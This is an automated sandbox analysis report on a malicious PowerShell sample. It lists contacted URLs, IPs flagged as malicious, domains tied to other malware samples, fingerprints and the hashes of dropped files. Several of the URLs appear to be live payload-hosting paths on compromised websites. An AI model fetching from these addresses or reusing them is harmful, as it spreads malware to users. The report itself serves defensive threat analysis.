                              http://o.ss2.us/0powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://mikegeerinck.com/xmlrpc.php?rsdpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://e-proposals.io/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.mikegeerinck.com/blog/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.stmarouns.nsw.edu.auxpowershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.turkishsex.online/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.tutorialrepublic.com/examples/images/clients/3.jpgA69S.dll.2.drfalse
                                		high
                                https://www.stmarouns.nsw.edu.auxpowershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.turkishporno.pro/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/css/ecs-style.css?ver=3.1.0powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://olympiasoft.io/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/menu-animation.min.css?ver=3.1.powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/blog/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.turkishporn.pro/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-180x180powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=3.1.2powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1-207x300.jpgpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                162.241.148.243
                                		freelancerwebdesignerhyderabad.comUnited States
                                		46606UNIFIEDLAYER-AS-1UStrue
                                216.127.164.209
                                		admintk.comUnited States
                                		35916MULTA-ASN1USfalse
                                143.204.98.64
                                		www.stmarouns.nsw.edu.auUnited States
                                		16509AMAZON-02UStrue
                                159.65.89.222
                                		wm.mcdevelop.netUnited States
                                		14061DIGITALOCEAN-ASNUStrue
                                45.116.14.210
                                		etdog.comChina
                                		4785XTOM-AS-JPxTomJPtrue
                                35.214.199.246
                                		mikegeerinck.comUnited States
                                		19527GOOGLE-2UStrue
                                172.67.223.27
                                		www.hintup.com.brUnited States
                                		13335CLOUDFLARENETUStrue

                                General Information

                                Joe Sandbox Version:32.0.0 Black Diamond
                                Analysis ID:416466
                                Start date:18.05.2021
                                Start time:15:52:39
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 18s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:ps_script.ps1
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:23
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winPS1@4/15@9/7
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 91%
                                • Number of executed functions: 13
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .ps1
                                Warnings:
                                Show All
                                • Excluded IPs from analysis (whitelisted): 92.122.145.220, 40.88.32.150, 52.255.188.83, 104.43.139.144, 184.30.20.56, 20.50.102.62, 104.83.124.33, 205.185.216.42, 205.185.216.10, 20.54.26.129, 20.82.209.183, 92.122.213.194, 92.122.213.247
                                • Excluded domains from analysis (whitelisted): e8652.dscx.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                • Execution Graph export aborted for target powershell.exe, PID 5344 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5496 because it is empty

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:53:35API Interceptor45x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                162.241.148.243ps_script.ps1Get hashmaliciousBrowse
                                • freelancerwebdesignerhyderabad.com/cgi-bin/S/
                                sample2.docGet hashmaliciousBrowse
                                • freelancerwebdesignerhyderabad.com/cgi-bin/S/
                                form.docGet hashmaliciousBrowse
                                • freelancerwebdesignerhyderabad.com/cgi-bin/S/
                                216.127.164.209ps_script.ps1Get hashmaliciousBrowse
                                  159.65.89.222ps_script.ps1Get hashmaliciousBrowse
                                  • wm.mcdevelop.net/content/6F2gd/
                                  ps_script.ps1Get hashmaliciousBrowse
                                  • wm.mcdevelop.net/content/6F2gd/
                                  45.116.14.210ps_script.ps1Get hashmaliciousBrowse
                                  • etdog.com/wp-content/nu/
                                  ps_script.ps1Get hashmaliciousBrowse
                                  • etdog.com/wp-content/nu/
                                  35.214.199.246ps_script.ps1Get hashmaliciousBrowse
                                    ps_script.ps1Get hashmaliciousBrowse
                                      sample2.docGet hashmaliciousBrowse
                                        form.docGet hashmaliciousBrowse
                                          172.67.223.27ps_script.ps1Get hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            freelancerwebdesignerhyderabad.comps_script.ps1Get hashmaliciousBrowse
                                            • 162.241.148.243
                                            sample2.docGet hashmaliciousBrowse
                                            • 162.241.148.243
                                            form.docGet hashmaliciousBrowse
                                            • 162.241.148.243
                                            wm.mcdevelop.netps_script.ps1Get hashmaliciousBrowse
                                            • 159.65.89.222
                                            www.hintup.com.brps_script.ps1Get hashmaliciousBrowse
                                            • 172.67.223.27
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 104.21.54.33
                                            etdog.comps_script.ps1Get hashmaliciousBrowse
                                            • 45.116.14.210
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 45.116.14.210
                                            www.stmarouns.nsw.edu.aups_script.ps1Get hashmaliciousBrowse
                                            • 143.204.98.98
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 143.204.11.65
                                            admintk.comps_script.ps1Get hashmaliciousBrowse
                                            • 216.127.164.209
                                            sample2.docGet hashmaliciousBrowse
                                            • 210.56.52.6
                                            form.docGet hashmaliciousBrowse
                                            • 210.56.52.6
                                            http://goodjobssolutions.com/mayo-clinic-nmk5w/WQDXUGGDH1memfhbzQba7kowTEW24A/Get hashmaliciousBrowse
                                            • 210.56.52.6
                                            http://bubbawatsongolf.com/_ARCHIVE/1kkkKgOZ0fekTnDr9Y221yQmAabJ8I5yGEFlTawlU5OuJtZyYlUmm9/Get hashmaliciousBrowse
                                            • 210.56.52.6
                                            mikegeerinck.comps_script.ps1Get hashmaliciousBrowse
                                            • 35.214.199.246
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 35.214.199.246
                                            sample2.docGet hashmaliciousBrowse
                                            • 35.214.199.246
                                            form.docGet hashmaliciousBrowse
                                            • 35.214.199.246

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            MULTA-ASN1USShipment of your goods.exeGet hashmaliciousBrowse
                                            • 198.211.22.67
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 216.127.164.209
                                            Purchase Order #330716.exeGet hashmaliciousBrowse
                                            • 198.148.123.122
                                            NEW ORDER.exeGet hashmaliciousBrowse
                                            • 198.211.22.67
                                            hvEop8Y70Y.exeGet hashmaliciousBrowse
                                            • 198.148.114.222
                                            CUFUYO.exeGet hashmaliciousBrowse
                                            • 108.166.197.79
                                            RFQ 6300306423.docGet hashmaliciousBrowse
                                            • 198.52.113.151
                                            gV8xdP8bas.exeGet hashmaliciousBrowse
                                            • 66.152.187.17
                                            HUahIwV82u.exeGet hashmaliciousBrowse
                                            • 66.152.179.11
                                            5r673DxGK8.exeGet hashmaliciousBrowse
                                            • 198.211.22.80
                                            yqfUONVqpk.exeGet hashmaliciousBrowse
                                            • 66.152.187.17
                                            2o0y7CvHF2.exeGet hashmaliciousBrowse
                                            • 72.44.77.68
                                            N5eld3tiba.exeGet hashmaliciousBrowse
                                            • 72.44.77.68
                                            Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                            • 198.52.105.123
                                            RdLlHaxEKP.exeGet hashmaliciousBrowse
                                            • 173.82.229.126
                                            CMahQwuvAE.exeGet hashmaliciousBrowse
                                            • 66.152.187.17
                                            Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                            • 198.211.22.68
                                            hkcmd.exeGet hashmaliciousBrowse
                                            • 66.152.187.17
                                            DNSmonitor.x86Get hashmaliciousBrowse
                                            • 198.211.10.10
                                            Agreement.xlsxGet hashmaliciousBrowse
                                            • 66.152.187.17
                                            UNIFIEDLAYER-AS-1USInvoice 172850 paul@forthebiome.com.htmlGet hashmaliciousBrowse
                                            • 198.1.102.16
                                            Proof_of_Payment.exeGet hashmaliciousBrowse
                                            • 192.185.129.69
                                            PO.exeGet hashmaliciousBrowse
                                            • 108.179.232.163
                                            invoice copy.pdf.exeGet hashmaliciousBrowse
                                            • 192.185.136.173
                                            Shipment of your goods.exeGet hashmaliciousBrowse
                                            • 162.241.61.214
                                            New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                            • 162.241.24.143
                                            diagram-1698815848.xlsGet hashmaliciousBrowse
                                            • 162.241.27.24
                                            diagram-2107205359.xlsGet hashmaliciousBrowse
                                            • 216.172.184.172
                                            Comprobantedepago.exeGet hashmaliciousBrowse
                                            • 192.185.129.69
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 162.241.148.243
                                            diagram-1439249772.xlsGet hashmaliciousBrowse
                                            • 162.241.27.24
                                            _S4737468_.htmlGet hashmaliciousBrowse
                                            • 162.214.48.210
                                            lkmfwWQyu3.dllGet hashmaliciousBrowse
                                            • 192.163.233.216
                                            lkmfwWQyu3.dllGet hashmaliciousBrowse
                                            • 192.163.233.216
                                            ytUsz4l0Qo.php.dllGet hashmaliciousBrowse
                                            • 192.163.233.216
                                            ytUsz4l0Qo.php.dllGet hashmaliciousBrowse
                                            • 192.163.233.216
                                            catalog-458980479.xlsGet hashmaliciousBrowse
                                            • 108.167.188.238
                                            $RAULIU9.exeGet hashmaliciousBrowse
                                            • 162.241.5.112
                                            play_audio_gail.chin@nationalmi.com_file.htmGet hashmaliciousBrowse
                                            • 69.49.228.44
                                            vx6dGnJxS.dllGet hashmaliciousBrowse
                                            • 192.163.233.216
                                            AMAZON-02USz7buieR7Xl.exeGet hashmaliciousBrowse
                                            • 15.207.158.4
                                            PO.exeGet hashmaliciousBrowse
                                            • 52.58.78.16
                                            Shipment of your goods.exeGet hashmaliciousBrowse
                                            • 52.15.160.167
                                            44285,8901393519.dllGet hashmaliciousBrowse
                                            • 13.225.75.73
                                            iteratorPasteGlobal.dllGet hashmaliciousBrowse
                                            • 13.225.75.73
                                            New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                            • 3.128.211.88
                                            proforma invoice.exeGet hashmaliciousBrowse
                                            • 52.58.78.16
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 143.204.98.98
                                            Fences3-sd-setup.exeGet hashmaliciousBrowse
                                            • 3.0.9.5
                                            vbProcedureLink.dllGet hashmaliciousBrowse
                                            • 13.224.91.73
                                            $RAULIU9.exeGet hashmaliciousBrowse
                                            • 54.65.44.217
                                            Click HERE to start the File Launcher by WebNavigator Installer_8kxrizjg_.exeGet hashmaliciousBrowse
                                            • 13.224.193.78
                                            Doc3#089 Senasys, Inc.exeGet hashmaliciousBrowse
                                            • 13.248.216.40
                                            malware.htmlGet hashmaliciousBrowse
                                            • 34.252.166.160
                                            N0vktYxfuWjaTvG.exeGet hashmaliciousBrowse
                                            • 13.232.164.78
                                            6163F584F65079263750327321F3D6CE71BC745F67B44.exeGet hashmaliciousBrowse
                                            • 3.13.191.225
                                            AN3M8O5NwA.exeGet hashmaliciousBrowse
                                            • 18.191.68.101
                                            ehbLUKWH81.exeGet hashmaliciousBrowse
                                            • 18.185.153.48
                                            NzqOz8Fl59.exeGet hashmaliciousBrowse
                                            • 52.216.185.131
                                            a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                            • 18.236.1.157

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eDHL Original Shipping Documents and BL.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            SecuriteInfo.com.Scr.Malcodegdn30.5930.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            BRW485F99CAF01F_007361.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            umoworldcorp4setup.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            ps_script.ps1Get hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            Hexenmaister.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            CElX5IAwAg.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            WAnYq4Yh0Z.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            bIeqskeWm6.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            i.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            IqDf5xrxZL.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            Qc78opSY35.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            BUEyR2fRx9.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            hYIe5B4Xsz.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            ZqSGeV2yQd.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            tpdwIENhDh.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            NzqOz8Fl59.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            metina_2.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            xxrM0xh3us.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27
                                            gt5V1dq88s.exeGet hashmaliciousBrowse
                                            • 143.204.98.64
                                            • 35.214.199.246
                                            • 172.67.223.27

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1391
                                            Entropy (8bit):7.705940075877404
                                            Encrypted:false
                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                            Malicious:false
                                            Reputation:low
                                            Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):59863
                                            Entropy (8bit):7.99556910241083
                                            Encrypted:true
                                            SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                            MD5:15775D95513782F99CDFB17E65DFCEB1
                                            SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                            SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                            SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):192
                                            Entropy (8bit):2.7633865340992063
                                            Encrypted:false
                                            SSDEEP:3:kkFklveQp9vfllXlE/zMcp1lhlXNNX8RolJuRdyo1dlUKlGXJlDdt:kK5Qk1hRNMa8Rdy+UKcXP
                                            MD5:4E5ECF91FA69686F361D7CC07E3D6582
                                            SHA1:ECAFA212690044EBFE1D65C951B69E0C62B8E024
                                            SHA-256:70BA421E61DED79AA08B0EABD03A9D4BEB2CE8EC6483652D861B5417D1EC12DF
                                            SHA-512:C99204682F35AEC3E2F8DAA944788A20D308513177F63D3FE8CC9299570591B576A000A948A15EE9CADA455103787748F52BC77022F051AA8D592A830013342D
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ........\;.s9L..(....................................................... ..........~...L...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):326
                                            Entropy (8bit):3.1311944695345195
                                            Encrypted:false
                                            SSDEEP:6:kKrGpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:DGphZkPlE99SNxAhUeSKO
                                            MD5:6AC4AA25A8648DAA545A3A84A25E9AAD
                                            SHA1:BB16BACC25BE0625F1D3B151EA8E2D7AFF37CA9F
                                            SHA-256:3F4FBF2A712326719D80FABEC044640324A7C0796B7F21EC359B527BD00CFC10
                                            SHA-512:89CEF3B3991ED130FA1BBB39C484C6550517618DB0BE703BBB1C4147961DBC50463C507A33E4F3D360AD104B6193DD3E8E39AD3A0F5588E9A03987C2912DDF84
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ..........2s9L..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):11606
                                            Entropy (8bit):4.883977562702998
                                            Encrypted:false
                                            SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                            MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                            SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                            SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                            SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.9260988789684415
                                            Encrypted:false
                                            SSDEEP:3:Nlllulb/lj:NllUb/l
                                            MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                            SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                            SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                            SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: @...e................................................@..........
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccvww3n.ra1.psm1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cif5usda.lst.psm1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
